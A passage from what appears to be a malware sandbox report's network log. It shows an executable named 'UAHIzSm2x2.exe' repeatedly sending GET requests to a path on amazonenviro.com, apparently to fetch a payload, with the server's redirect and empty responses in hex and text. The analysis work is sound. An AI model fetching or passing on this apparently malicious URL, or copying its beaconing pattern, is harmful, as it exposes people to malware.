                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:01.033447981 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:01.344388008 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:01 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:02.983891964 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:03.294997931 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:03 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:04.922523022 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:05.233359098 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:05 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:06.849942923 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:07.160624981 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:07 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:08.768636942 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:09.078969955 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:10.706983089 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:11.017462969 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:10 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649718166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:10 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:10 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649736166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:12 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:12 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:12 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649748166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:14 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:14 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:14 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.649761166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:16 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:16 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.649777166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:18 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:18 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:18 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.649794166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:20 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:20 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:20 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.649806166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:22 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:22 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:22 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.649824166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:24 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:24 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.649841166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:26 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:26 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.649856166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:28 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:28 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:28 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.649871166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:30 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:30 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:30 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.649881166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:32 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:32 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:32 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.649896166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:34 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:34 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:34 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.649909166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:35 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:36 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:36 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.649926166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:37 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:38 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:38 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.649941166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:39 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:40 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:40 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.649953166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:41 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:42 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:42 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.649966166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:43 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:44 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.649982166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:46 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:47 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.649998166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:48 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:49 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:48 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
